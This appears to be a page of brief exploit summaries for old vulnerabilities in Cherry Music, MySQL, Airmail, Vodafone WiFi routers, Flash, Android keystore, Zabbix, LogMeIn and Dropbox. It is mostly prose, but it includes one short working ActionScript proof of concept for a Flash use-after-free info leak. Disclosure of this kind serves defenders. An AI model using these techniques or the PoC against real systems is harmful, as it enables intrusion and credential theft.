A directory traversal vulnerability in Cherry Music v0.35.1 allows authenticated users to download arbitrary files from the server. An attacker can send a specially crafted request to the server with a maliciously crafted value parameter containing a list of files to download. This can be exploited to download sensitive files from the server.
This is a limited version of the PoC exploit. It only allows appending to existing mysql config files with weak permissions. It can be exploited on default installations of MySQL on systems with no writable my.cnf config files available.
Airmail implements its user interface using an embedded version of WebKit, furthermore Airmail on OS X will render any URI as a clickable HTML <a href= link. An attacker can create a simple JavaScript URI (e.g., javascript:) which when clicked grants the attacker initial JavaScript execution (XSS) in the context of the application DOM. An attacker can also use a JavaScript URI to read arbitrary files from the local file system.
This exploit is used to reset the password of Vodafone Mobile WiFi devices. It uses a brute-force attack to guess the password and gain access to the device. The exploit is written in Python and uses the urllib2, json, datetime, time, httplib, threading, Queue, and multiprocessing modules.
If a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a user-after-free.
There is an info leak in the Transform.colorTranform getter. If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Tranform. A minimal PoC is as follows: this.createEmptyMovieClip( "mc", 1); var c = new ColorTransform( 77, 88, 99, 0.5, 1, 2, 3, 4); var t:Transform = new Transform( mc ); t.colorTransform = c; this.createTextField( "tf", 2, 0, 0, 2000, 200); var ct = ColorTransform; var g = flash.geom; g.addProperty("ColorTransform", func, func); var q = t.colorTransform; tf.text = q.greenMultiplier + "n" + q.blueMultiplier + "n" + q.color; function func(){ mc.removeMovieClip(); return ct; }
There's an inconsistency between the way that the two functions in libutils/Unicode.cpp handle invalid surrogate pairs in UTF16, resulting in a mismatch between the size calculated by utf16_to_utf8_length and the number of bytes written by utf16_to_utf8. This results in a heap-buffer-overflow; one route to this code is the String8 constructor initialising a String8 from a String16. This can be reached via binder calls to the core system service 'android.security.keystore' from a normal app context without any additional permissions.
This exploit is a Python PoC for a SQL Injection vulnerability in Zabbix versions 2.0 to 3.0.4. It allows an attacker to extract the username and password of a user, as well as the session ID of a logged in user, by exploiting a vulnerability in the web interface of Zabbix. The exploit is done by sending a malicious payload to the jsrpc.php page of the Zabbix web interface.
LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. A potential attacker could reveal the supplied username and password in order to gain access to account.
Services By CQR